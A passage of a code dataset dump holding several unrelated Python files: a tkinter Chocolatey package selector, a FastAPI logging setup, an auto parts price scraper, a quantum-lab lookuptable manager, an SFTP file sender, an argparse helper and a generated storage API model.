}\n temp.append(albums_info)\n\n elif dig_type == 'list':\n for i in range(0, len(data)):\n playlists_info = {\n 'list_id': data[i]['id'],\n 'list_name': data[i]['name'],\n 'creator_name': data[i]['creator']['nickname']\n }\n temp.append(playlists_info)\n\n elif dig_type == 'channel':\n channel_info = {\n 'song_id': data['id'],\n 'song_name': data['name'],\n 'artist': data['artists'][0]['name'],\n 'album_name': 'DJ',\n 'mp3_url': data['mp3Url']\n }\n temp = channel_info\n\n return temp","sub_path":"server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"256126411","text":"from tkinter import *\n\n\ndef fermerlafenetre():\n windows3.quit()\n windows3.destroy()\n\n\n\nwindows3 = Tk()\nwindows3.geometry(\"1024x720\")\nwindows3.config(background=\"#197de1\")\nw = Label(windows3, text ='Delectionner les logiciels que vous ne voulez pas installer', font = \"50\", bg=(\"white\"), fg=(\"#ED7F46\"))\nw.pack()\n\nCheckbutton1 = IntVar()\nCheckbutton2 = IntVar()\nCheckbutton3 = IntVar()\nCheckbutton4 = IntVar()\nCheckbutton5 = IntVar()\nCheckbutton6 = IntVar()\nCheckbutton7 = IntVar()\nCheckbutton8 = IntVar()\nCheckbutton9 = IntVar()\nCheckbutton10 = IntVar()\n###activation par defaut\nCheckbutton1.set(1)\nCheckbutton2.set(1)\nCheckbutton3.set(1)\nCheckbutton4.set(1)\nCheckbutton5.set(1)\nCheckbutton6.set(1)\nCheckbutton7.set(1)\nCheckbutton8.set(1)\nCheckbutton9.set(1)\nCheckbutton10.set(1)\n\nButton1 = Checkbutton(windows3, text = \"choco install adobereader\",\n variable = Checkbutton1,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton2 = Checkbutton(windows3, text = \"choco install firefox\",\n variable = Checkbutton2,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton3 = Checkbutton(windows3, text = \"choco install googlechrome\",\n variable = Checkbutton3,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton4 = Checkbutton(windows3, text = \"choco install openvpn-community\",\n variable = Checkbutton4,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton5 = Checkbutton(windows3, text = \"choco install javaruntime\",\n variable = Checkbutton5,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton6 = Checkbutton(windows3, text = \"choco install keepass\",\n variable = Checkbutton6,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton7 = Checkbutton(windows3, text = \"choco install 7zip.install\",\n variable = Checkbutton7,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton8 = Checkbutton(windows3, text = \"choco install naps2\",\n variable = Checkbutton8,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton9 = Checkbutton(windows3, text = \"choco install tightvnc\",\n variable = Checkbutton9,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\nButton10 = Checkbutton(windows3, text = \"choco install libreoffice\",\n variable = Checkbutton10,\n onvalue = 1,\n offvalue = 0,\n height = 2,\n width = 50)\n\n\nButton1.pack()\nButton2.pack()\nButton3.pack()\nButton4.pack()\nButton5.pack()\nButton6.pack()\nButton7.pack()\nButton8.pack()\nButton9.pack()\nButton10.pack()\n\n##on crée une frame pour gere la position de nos textes. on indique ou on l apositione , ici c'est windows\n#Pour visualiser cette frame on peu ajouter les parametre : bd=1, relief=SUNKEN\nframe = Frame(windows3, bg=(\"#197de1\"), bd=1, relief=SUNKEN)\n# ajouter un premier bouton\nInstall_software = Button(frame, text=\"Cliquer pour Valider\", font=(\"Courrier\", 25), bg=(\"white\"), fg=(\"#ED7F46\"), command=fermerlafenetre)\n##marge en y du bouton =>pady = 25 et remplssage en x => fill=X\nInstall_software.pack(pady=25, fill=X)\n##ajout de frame\nframe.pack(expand=YES)\n\nmainloop()\n\n\n\n\nmeslogiciels = []\nprint(Checkbutton1.get())\nprint(Checkbutton2.get())\nprint(Checkbutton3.get())\nif Checkbutton1.get() == 1:\n meslogiciels.append(\"choco install -y adobereader\")\nif Checkbutton2.get() == 1:\n meslogiciels.append(\"choco install firefox\")\nif Checkbutton3.get() == 1:\n meslogiciels.append(\"choco install googlechrome\")\nif Checkbutton4.get() == 1:\n meslogiciels.append(\"choco install openvpn-community\")\nif Checkbutton5.get() == 1:\n meslogiciels.append(\"choco install javaruntime\")\nif Checkbutton6.get() == 1:\n meslogiciels.append(\"choco install keepass\")\nif Checkbutton7.get() == 1:\n meslogiciels.append(\"choco install 7zip.install\")\nif Checkbutton8.get() == 1:\n meslogiciels.append(\"choco install naps2\")\nif Checkbutton9.get() == 1:\n meslogiciels.append(\"choco install tightvnc\")\nif Checkbutton10.get() == 1:\n meslogiciels.append(\"choco install libreoffice\")\n\n\n\nfor value in meslogiciels:\n print(value)\n","sub_path":"Chocolatey/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237104352","text":"import logging\n\nfrom fastapi.applications import FastAPI\n\nfrom utilities.logging.sinks import add_terminal_sink, add_custom_sink, add_file_sink\nfrom utilities.logging.handlers import LoggingIntercepter, http_request_logging_middleware\nfrom loguru import logger\n\n\ndef _clear_default_logging_handlers(prefix=''):\n \"\"\"\n Clears the handlers for all existing loggers.\n Provide a logger prefix to limit the set of loggers\n to clear handlers for.\n \"\"\"\n loggers = (\n logging.getLogger(name)\n for name in logging.root.manager.loggerDict\n if name.startswith(prefix)\n )\n for log in loggers:\n log.handlers = []\n\n\ndef _clear_default_loguru_handlers():\n logger.configure(handlers=[])\n\n\ndef initialize_logging():\n \"\"\"\n Initializes logging handlers and sinks. New sinks and handlers\n should be registered in this function.\n \"\"\"\n\n # Uvicorn is set up with default loggers.\n # We override them here in order to control how, when, and where\n # uvicorn (and all other) logs are handled.\n _clear_default_logging_handlers(prefix='uvicorn.')\n _clear_default_loguru_handlers()\n\n # Intercept all uvicorn logs so we can process them as we see fit\n logging.getLogger(\"uvicorn\").handlers = [LoggingIntercepter()]\n\n # All logs emitted by 1) the intercepter and 2) all loguru.logger.* method calls\n # will be sent to a loguru sink. Sinks are simply destinations for logging data.\n # By default, we add two sinks; one for sending logs to the console and to a file.\n # To send logs to a database, e.g. an Elasticsearch instance, simply add a custom\n # sink to send the data there.\n # See https://loguru.readthedocs.io/en/stable/api/logger.html for details.\n add_file_sink(logger)\n add_terminal_sink(logger)\n\n # Arbitrary sinks to process raw log records (for sending to log databases for example)\n # can be configured as such:\n \n # add_custom_sink(logger, lambda record: print(\n # f'Received raw log record: {record}'\n # ))\n\n\ndef initialize_logging_middleware(app: FastAPI):\n app.middleware(\"http\")(http_request_logging_middleware)\n","sub_path":"iq-test/utilities/logging/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437633036","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom . import z_standart\n\n\ndef get_scu(phpsessid, search_text):\n url = 'http://auto.irbis.ua/price/'+search_text+'/'\n headers = {\n 'Host': 'auto.irbis.ua',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Referer': 'http://auto.irbis.ua/price/AL12/',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'uk-UA,uk;q=0.8,ru;q=0.6,en-US;q=0.4,en;q=0.2',\n 'Cookie': 'PHPSESSID='+phpsessid+'; user_auth_session=1; _ga=GA1.2.2088670763.1505318465; _gid=GA1.2.411157468.1505590944; _gat=1',\n }\n\n r = requests.get(url, headers=headers)\n print('irbis: get_scu status:', r.status_code)\n dataset = []\n # if r.status_code == 503:\n # data = {'desc_full': 'IRBIS don`t response... '}\n # dataset.append(data)\n # # print(dataset)\n # return dataset\n\n soup = BeautifulSoup(r.content, 'html5lib')\n\n trs = soup.find_all('tr', id=re.compile('^tr'))\n if len(trs) == 0:\n dataset = [{'desc': 'nothing found on request...', 'price': '0.00', 'home1': '0', 'home2': '0', 'other': '0'}]\n return dataset\n #print(len(trs))\n for i, tr in enumerate(trs):\n data = {}\n\n tds = tr.find_all('td')\n # print(i, tds)\n if len(tds) > 1:\n # print(tds)\n try:\n brand = tds[0].find('a').get_text().lstrip()\n # data.update({'brand': standartization(brand)})\n #print(brand)\n\n number = tds[1].find('a').get_text().lstrip()\n # data.update({'number': number})\n # print(number)\n brand, number = z_standart.standartization(brand, number)\n data.update({'brand': brand, 'number': number})\n\n url_buy = tds[1].find('a')['href']\n data.update({'url_buy': 'http://auto.irbis.ua' + url_buy})\n # print(url_buy)\n\n desc = tds[2].get_text().lstrip().rstrip()\n data.update({'desc': desc})\n data.update({'desc_full': desc})\n # print(desc)\n\n price = tds[4].get_text().replace(' грн.', '').strip()\n price = price.replace('Распродажа товаров', '')\n price = price.replace('---', '0.00')\n data.update({'price': price})\n # print(price)\n\n try:\n img = tds[3].find('img').get('src')\n data.update({'img': img})\n # print(img)\n except:\n pass\n\n # get rest\n rests = tds[5].find_all('option')\n rest_data = {'home1': '0', 'home2': '0', 'other': 0}\n plus_flag = False\n for rest_row in rests:\n item = rest_row.get_text().split(' ')\n # print(item)\n if item[0] == 'Киев':\n home1 = item[2].replace('шт', '')\n if '>' in home1:\n home1 = home1.replace('>', '')\n rest_data.update({'home1_bold': 'bold'})\n plus_flag = True\n rest_data.update({'home1': home1})\n elif item[0] == 'Харьков':\n home2 = item[2].replace('шт', '')\n if '>' in home2:\n home2 = home2.replace('>', '')\n rest_data.update({'home2_bold': 'bold'})\n plus_flag = True\n rest_data.update({'home2': home2})\n elif item[0] == 'Под':\n pass\n else:\n other_loc = int(item[2].replace('шт', '').replace('>', '')) + rest_data['other']\n rest_data.update({'other': other_loc})\n\n if plus_flag:\n rest_data.update({'other_bold': 'bold'})\n # print(rest_data)\n data.update(rest_data)\n except:\n pass\n\n if len(data) > 1:\n # print(data, len(data))\n dataset.append(data)\n\n # try:\n # del dataset[0]\n # del dataset[1]\n # except:\n # pass\n if len(dataset) == 0:\n dataset = [{'desc': 'nothing found on request...', 'price': '0.00', 'home1': '0', 'home2': '0', 'other': '0'}]\n\n return dataset\n\n# print(get_scu(user_auth, phpsessid, search_text))\n","sub_path":"async_search/irbis.py","file_name":"irbis.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162347007","text":"\nimport numpy as np\nfrom qcodes.instrument.base import Instrument\nfrom qcodes.instrument.parameter import ManualParameter\nfrom qcodes.utils import validators as vals\nimport logging\nfrom pycqed.measurement import Pulse_Generator as PG\nimport unittest\nimport matplotlib.pyplot as plt\nimport imp\nfrom pycqed.analysis.fit_toolbox import functions as func\n\nimp.reload(PG)\n\nglobal lm # Global used for passing value to the testsuite\n\n\nclass UHFQC_LookuptableManagerManager(Instrument):\n\n '''\n meta-instrument that can produce multiplexed pulses by adding pulses\n from different lookupotable managers.\n\n For now this is a test version that only stores the parameters for a\n specific set of pulses.\n '''\n shared_kwargs = ['UHFQC']\n\n def __init__(self, name, UHFQC, **kw):\n\n logging.warning('The UHFQC_LookuptableManagerManager is deprecated')\n logging.info(__name__ + ' : Initializing instrument')\n super().__init__(name, **kw)\n\n\n self.UHFQC = UHFQC\n self.add_parameter('mixer_QI_amp_ratio', vals=vals.Numbers(),\n parameter_class=ManualParameter,\n initial_value=1.0)\n self.add_parameter('mixer_IQ_phase_skewness', vals=vals.Numbers(),\n unit='deg',\n parameter_class=ManualParameter,\n initial_value=0.0)\n # These parameters are added for mixer skewness correction.\n # They are intended to be renamed such that they can be combined with\n # mixer_QI_amp_ratio and mixer_IQ_phase_skewness.\n self.add_parameter('mixer_alpha', vals=vals.Numbers(),\n parameter_class=ManualParameter,\n initial_value=1.0)\n self.add_parameter('mixer_phi', vals=vals.Numbers(), unit='deg',\n parameter_class=ManualParameter,\n initial_value=0.0)\n self.add_parameter('mixer_apply_predistortion_matrix', vals=vals.Bool(),\n parameter_class=ManualParameter,\n initial_value=False)\n\n self.add_parameter('acquisition_delay', vals=vals.Numbers(), unit='s',\n parameter_class=ManualParameter,\n initial_value=270e-9)\n self.add_parameter('LutMans', vals=vals.Anything(),\n set_cmd=self._attach_lutmans_to_Lutmanman)\n self.add_parameter('sampling_rate', vals=vals.Numbers(), unit='Hz',\n parameter_class=ManualParameter,\n initial_value=1.8e9)\n\n # Set to a default because box is not expected to change\n self._voltage_min = -1.0\n self._voltage_max = 1.0-1.0/2**13\n\n def _attach_lutmans_to_Lutmanman(self, LutMans):\n for LutMan in LutMans:\n LutManthis = self.find_instrument(LutMan)\n # equivalent to: self.LutMan= LutManthis\n setattr(self, LutMan, LutManthis)\n\n def generate_multiplexed_pulse(self, multiplexed_wave):\n '''\n Generates a basic set of pulses (I, X-180, Y-180, x-90, y-90, Block,\n X180_delayed)\n using the parameters set on this meta-instrument and returns the\n corresponding waveforms for both I and Q channels as a dict.\n\n Note the primitive set is a different set than the one used in\n Serwan's thesis.\n '''\n # Standard qubit pulses\n\n # RO pulses\n Wave_multi_I = np.array(np.zeros(2))\n Wave_multi_Q = np.array(np.zeros(2))\n for LutMan, pulse in multiplexed_wave:\n print(\"loading {} from {}\".format(pulse, LutMan))\n LutManthis = self.find_instrument(LutMan)\n Wave_element_I, Wave_element_Q = LutManthis.give_back_wave_forms(\n pulse_name=pulse)\n # Add to Wave_multi_I resize to check that the lengths are OK\n if len(Wave_element_I) > len(Wave_multi_I):\n Wave_multi_I.resize(Wave_element_I.shape)\n Wave_multi_I = Wave_multi_I+Wave_element_I\n Wave_multi_Q.resize(Wave_element_Q.shape)\n Wave_multi_Q = Wave_multi_Q+Wave_element_Q\n else:\n Wave_element_I.resize(Wave_multi_I.shape)\n Wave_multi_I = Wave_multi_I+Wave_element_I\n Wave_element_Q.resize(Wave_multi_Q.shape)\n Wave_multi_Q = Wave_multi_Q+Wave_element_Q\n\n Wave_multi = [Wave_multi_I, Wave_multi_Q]\n self._wave_dict = {'Multiplexed_pulse': Wave_multi}\n\n if self.mixer_apply_predistortion_matrix():\n M = self.get_mixer_predistortion_matrix()\n for key, val in self._wave_dict.items():\n self._wave_dict[key] = np.dot(M, val)\n\n return self._wave_dict\n\n def render_wave(self, wave_name, show=True, time_unit='lut_index'):\n fig, ax = plt.subplots(1, 1)\n if time_unit == 'lut_index':\n x = np.arange(len(self._wave_dict[wave_name][0]))\n ax.set_xlabel('Lookuptable index (i)')\n ax.vlines(\n 2048, self._voltage_min, self._voltage_max, linestyle='--')\n elif time_unit == 's':\n x = (np.arange(len(self._wave_dict[wave_name][0]))\n / self.sampling_rate.get())\n ax.set_xlabel('Time (s)')\n ax.vlines(2048 / self.sampling_rate.get(),\n self._voltage_min, self._voltage_max, linestyle='--')\n print(wave_name)\n ax.set_title(wave_name)\n ax.plot(x, self._wave_dict[wave_name][0],\n marker='o', label='chI')\n ax.plot(x, self._wave_dict[wave_name][1],\n marker='o', label='chQ')\n ax.set_ylabel('Amplitude (V)')\n ax.set_axis_bgcolor('gray')\n ax.axhspan(self._voltage_min, self._voltage_max, facecolor='w',\n linewidth=0)\n ax.legend()\n ax.set_ylim(self._voltage_min*1.1, self._voltage_max*1.1)\n ax.set_xlim(0, x[-1])\n if show:\n plt.show()\n return fig, ax\n\n def render_wave_PSD(self, wave_name, show=True,\n f_bounds=None, y_bounds=None):\n fig, ax = plt.subplots(1, 1)\n f_axis, PSD_I = func.PSD(\n self._wave_dict[wave_name][0], 1/self.sampling_rate())\n f_axis, PSD_Q = func.PSD(\n self._wave_dict[wave_name][1], 1/self.sampling_rate())\n\n ax.set_xlabel('frequency (Hz)')\n ax.set_title(wave_name)\n ax.plot(f_axis, PSD_I,\n marker='o', label='chI')\n ax.plot(f_axis, PSD_Q,\n marker='o', label='chQ')\n ax.set_ylabel('Spectral density (V^2/Hz)')\n ax.legend()\n\n ax.set_yscale(\"log\", nonposy='clip')\n if y_bounds is not None:\n ax.set_ylim(y_bounds[0], y_bounds[1])\n if f_bounds is not None:\n ax.set_xlim(f_bounds[0], f_bounds[1])\n if show:\n plt.show()\n return fig, ax\n\n def get_mixer_predistortion_matrix(self):\n '''\n predistortion matrix correcting for a mixer with amplitude\n mismatch \"mixer_alpha\" and skewness \"phi\"\n\n M = [ 1 tan(phi) ]\n [ 0 1/mixer_alpha * sec(phi)]\n\n Notes on the procedure for acquiring this matrix can be found in\n PycQED/docs/notes/MixerSkewnessCalibration_LDC_150629.pdf\n\n Note: The same effect as the predistortion matrix can also be achieved\n by setting the IQ-phase skewness and QI-amp-ratio paramters.\n '''\n\n mixer_pre_distortion_matrix = np.array(\n ((1, np.tan(self.get('mixer_phi')*2*np.pi/360)),\n (0, 1/self.get('mixer_alpha') * 1/np.cos(self.get('mixer_phi')*2*np.pi/360))))\n return mixer_pre_distortion_matrix\n\n def load_pulse_onto_AWG_lookuptable(self, pulse_name):\n '''\n Load a pulses to the lookuptable, it uses the lut_mapping to\n determine which lookuptable to load to.\n '''\n\n wave_dict = self._wave_dict\n I_wave = np.clip(wave_dict[pulse_name][0],\n self._voltage_min, self._voltage_max)\n Q_wave = np.clip(np.multiply(self.get('mixer_QI_amp_ratio'),\n wave_dict[pulse_name][1]), self._voltage_min,\n self._voltage_max)\n self.UHFQC.awg_sequence_acquisition_and_pulse(\n I_wave, Q_wave, self.acquisition_delay())\n\n def give_back_wave_forms(self, pulse_name):\n '''\n Load a pulses to the lookuptable, it uses the lut_mapping to\n determine which lookuptable to load to.\n '''\n wave_dict = self._wave_dict\n I_wave = np.clip(wave_dict[pulse_name][0],\n self._voltage_min, self._voltage_max)\n Q_wave = np.clip(np.multiply(self.get('mixer_QI_amp_ratio'),\n wave_dict[pulse_name][1]), self._voltage_min,\n self._voltage_max)\n return I_wave, Q_wave\n","sub_path":"deprecated/pycqed/instrument_drivers/meta_instrument/UHFQC_LookuptableManagerManager.py","file_name":"UHFQC_LookuptableManagerManager.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582488300","text":"import datetime\nimport os\nimport tempfile\nfrom pathlib import Path, PurePosixPath\nfrom typing import List, Union\n\nimport click\nimport paramiko\n\nfrom sending.curation_files import (\n LogFiles,\n NewFiles,\n PepFiles,\n PidFiles,\n SeqFiles,\n SubFiles,\n TrEMBLFiles,\n)\n\nREMOTE_HOST_NAME = os.environ.get(\"REMOTE_HOST_NAME\", \"remote host\")\n\n\nSEND_HELP = \"Sends all curated files to the remote FTP server.\"\n\n\n@click.command(help=SEND_HELP)\ndef send() -> None:\n \"\"\"Main entry point for send command.\n\n Sends all curated files to the remote FTP server.\n \"\"\"\n\n # Load curation files objects\n trembl_files = TrEMBLFiles()\n new_files = NewFiles()\n pep_files = PepFiles()\n sub_files = SubFiles()\n logfiles = LogFiles()\n pid_files = PidFiles()\n seq_files = SeqFiles()\n\n # Load FTP credentials\n try:\n remote_server = os.environ[\"REMOTE_SERVER\"]\n remote_user = os.environ[\"REMOTE_USER\"]\n remote_key = os.environ[\"REMOTE_KEY\"]\n known_hosts = os.environ[\"KNOWN_HOSTS\"]\n except KeyError as err:\n raise click.ClickException(\n f\"Could not detect an environment variable for {err}s.\"\n )\n\n # Create SFTP connection and do the transfers\n try:\n key = paramiko.Ed25519Key.from_private_key_file(remote_key)\n except FileNotFoundError as err:\n raise click.ClickException(\n f\"There was a problem loading the remote key file, please check your configuration:\\n{err}\"\n )\n\n try:\n hostkeys = paramiko.HostKeys(filename=known_hosts)\n hkey = hostkeys[remote_server][\"ecdsa-sha2-nistp256\"]\n except FileNotFoundError as err:\n raise click.ClickException(\n f\"There was a problem loading the known hosts file, please check your configuration:\\n{err}\"\n )\n except KeyError as err:\n raise click.ClickException(f\"Host {str(err)} not found in known_hosts file.\")\n\n transport = paramiko.Transport((remote_server, 22))\n transport.connect(username=remote_user, pkey=key, hostkey=hkey)\n with paramiko.SFTPClient.from_transport(transport) as sftp:\n new_entries = [trembl_files, new_files, pep_files, sub_files]\n _send_new_entries(new_entries, sftp)\n for updates in [logfiles, pid_files, seq_files]:\n _send_updates(updates, sftp)\n transport.close()\n\n\ndef _send_updates(\n files: Union[LogFiles, PidFiles, SeqFiles], sftp: paramiko.SFTPClient\n) -> None:\n \"\"\"Sends update files to the remote FTP server.\n \n This function is used for logfiles, pid update files and seq update files\n (*.log, *.pid, *.seq) which can be transferred directly with no further\n processing needed.\n \n Args:\n files: list of CurationFiles objects (LogFiles, PidFiles, SeqFiles).\n sftp: paramiko SFTPClient object.\n \n \"\"\"\n if files:\n for f in files:\n localpath = str(f)\n remotepath = str(PurePosixPath(str(files.remote_dir), f.name))\n sftp.put(localpath=localpath, remotepath=remotepath)\n click.echo(f\"Sent {f.name} to {files.remote_dir}\")\n click.secho(f\"Sent all {str(files)} to {REMOTE_HOST_NAME}.\", fg=\"green\")\n click.echo(\"---\")\n else:\n click.echo(f\"No {str(files)} to send.\")\n click.echo(\"---\")\n\n\ndef _send_new_entries(\n files: List[Union[TrEMBLFiles, NewFiles, PepFiles, SubFiles]],\n sftp: paramiko.SFTPClient,\n) -> None:\n \"\"\"Sends new entries to the remote FTP server. \n \n \"New entries\" includes curated TrEMBL entries plus other new entries such\n as direct submissions. These files must be concatenated into a single file\n named \"allnew\" with a date stamp appended to the filename before transfer.\n\n A temporary directory is used to make the \"allnew\" file.\n \n Args:\n trembl_files: TrEMBLFiles object\n new_files: NewFiles object\n sftp: paramiko SFTPClient object\n \"\"\"\n\n if any(files):\n date_string = datetime.date.today().strftime(\"%Y%m%d\")\n # Remote directory is the same for all new files so just look at the\n # first object in the list\n remote_dir = files[0].remote_dir\n\n with tempfile.TemporaryDirectory() as tmp:\n # Concatenate new, sub and pep files to allnew\n allnew = Path(tmp, f\"allnew_{date_string}.swp\")\n for f in files:\n if f:\n f.write_files(allnew, mode=\"a\")\n for file in f:\n click.echo(\n f\"Adding file {file.name} to concatenated file {allnew.name}\"\n )\n # Transfer allnew file to remote server\n localpath = str(allnew)\n remotepath = str(PurePosixPath(str(remote_dir), allnew.name))\n sftp.put(localpath=localpath, remotepath=remotepath)\n click.echo(f\"Sent {allnew.name} to {remote_dir}\")\n click.secho(f\"Sent all new files to {REMOTE_HOST_NAME}.\", fg=\"green\")\n click.echo(\"---\")\n else:\n click.echo(\"No new files to send.\")\n click.echo(\"---\")\n","sub_path":"sending/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309957422","text":"import sys\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\nfrom functools import partial\n\nfrom aku import add_option\n\n\nclass Aku(object):\n def __init__(self, prog: str = None, usage: str = None, description: str = None):\n super(Aku, self).__init__()\n self.parser = ArgumentParser(\n prog=prog, usage=usage, description=description,\n formatter_class=ArgumentDefaultsHelpFormatter,\n )\n self._funcs = {}\n\n def register(self, func):\n self._funcs[func.__name__] = func\n return func\n\n def run(self, args=None, namespace=None):\n self.delays = []\n\n if len(self._funcs) == 1:\n fn = list(self._funcs.values())[0]\n add_option.add_function(\n parser=self.parser, prefix=None, name=None,\n annotation=fn, default=None, delays=self.delays,\n )\n else:\n subparsers = self.parser.add_subparsers()\n parsers = {\n name: subparsers.add_parser(name)\n for name, _ in self._funcs.items()\n }\n if sys.argv.__len__() > 1 and sys.argv[1] in parsers:\n fn = self._funcs[sys.argv[1]]\n add_option.add_function(\n parser=parsers[sys.argv[1]], prefix=None, name=None,\n annotation=fn, default=None, delays=self.delays,\n )\n\n args, _ = self.parser.parse_known_args(args, namespace)\n self.raw_args = {k: v for k, v in vars(args).items()}\n self.args = {k: v for k, v in vars(args).items()}\n\n for dest, name, key in reversed(self.delays):\n self.args[dest] = partial(self.args[dest], **{name: self.args[key]})\n del self.args[key]\n\n obj_dest = f'@{dest}'\n if obj_dest in self.args:\n del self.args[obj_dest]\n if dest in self.raw_args and obj_dest in self.raw_args:\n self.raw_args[dest] = self.raw_args[obj_dest]\n del self.raw_args[obj_dest]\n\n return fn(**self.args)\n\n\nApp = Aku\n","sub_path":"aku/aku.py","file_name":"aku.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407875873","text":"# coding: utf-8\n\n\"\"\"\n Pure Storage FlashBlade REST 1.6 Python SDK\n\n Pure Storage FlashBlade REST 1.6 Python SDK, developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).\n\n OpenAPI spec version: 1.6\n Contact: info@purestorage.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass Space(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'virtual': 'int',\n 'data_reduction': 'float',\n 'unique': 'int',\n 'snapshots': 'int',\n 'total_physical': 'int'\n }\n\n attribute_map = {\n 'virtual': 'virtual',\n 'data_reduction': 'data_reduction',\n 'unique': 'unique',\n 'snapshots': 'snapshots',\n 'total_physical': 'total_physical'\n }\n\n def __init__(self, virtual=None, data_reduction=None, unique=None, snapshots=None, total_physical=None):\n \"\"\"\n Space - a model defined in Swagger\n \"\"\"\n\n self._virtual = None\n self._data_reduction = None\n self._unique = None\n self._snapshots = None\n self._total_physical = None\n\n if virtual is not None:\n self.virtual = virtual\n if data_reduction is not None:\n self.data_reduction = data_reduction\n if unique is not None:\n self.unique = unique\n if snapshots is not None:\n self.snapshots = snapshots\n if total_physical is not None:\n self.total_physical = total_physical\n\n @property\n def virtual(self):\n \"\"\"\n Gets the virtual of this Space.\n usage in bytes\n\n :return: The virtual of this Space.\n :rtype: int\n \"\"\"\n return self._virtual\n\n @virtual.setter\n def virtual(self, virtual):\n \"\"\"\n Sets the virtual of this Space.\n usage in bytes\n\n :param virtual: The virtual of this Space.\n :type: int\n \"\"\"\n\n self._virtual = virtual\n\n @property\n def data_reduction(self):\n \"\"\"\n Gets the data_reduction of this Space.\n reduction of data\n\n :return: The data_reduction of this Space.\n :rtype: float\n \"\"\"\n return self._data_reduction\n\n @data_reduction.setter\n def data_reduction(self, data_reduction):\n \"\"\"\n Sets the data_reduction of this Space.\n reduction of data\n\n :param data_reduction: The data_reduction of this Space.\n :type: float\n \"\"\"\n\n self._data_reduction = data_reduction\n\n @property\n def unique(self):\n \"\"\"\n Gets the unique of this Space.\n physical usage in bytes\n\n :return: The unique of this Space.\n :rtype: int\n \"\"\"\n return self._unique\n\n @unique.setter\n def unique(self, unique):\n \"\"\"\n Sets the unique of this Space.\n physical usage in bytes\n\n :param unique: The unique of this Space.\n :type: int\n \"\"\"\n\n self._unique = unique\n\n @property\n def snapshots(self):\n \"\"\"\n Gets the snapshots of this Space.\n physical usage by snapshots, other than unique in bytes\n\n :return: The snapshots of this Space.\n :rtype: int\n \"\"\"\n return self._snapshots\n\n @snapshots.setter\n def snapshots(self, snapshots):\n \"\"\"\n Sets the snapshots of this Space.\n physical usage by snapshots, other than unique in bytes\n\n :param snapshots: The snapshots of this Space.\n :type: int\n \"\"\"\n\n self._snapshots = snapshots\n\n @property\n def total_physical(self):\n \"\"\"\n Gets the total_physical of this Space.\n total physical usage (including snapshots) in bytes\n\n :return: The total_physical of this Space.\n :rtype: int\n \"\"\"\n return self._total_physical\n\n @total_physical.setter\n def total_physical(self, total_physical):\n \"\"\"\n Sets the total_physical of this Space.\n total physical usage (including snapshots) in bytes\n\n :param total_physical: The total_physical of this Space.\n :type: int\n \"\"\"\n\n self._total_physical = total_physical\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, Space):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","sub_path":"purity_fb/purity_fb_1dot6/models/space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 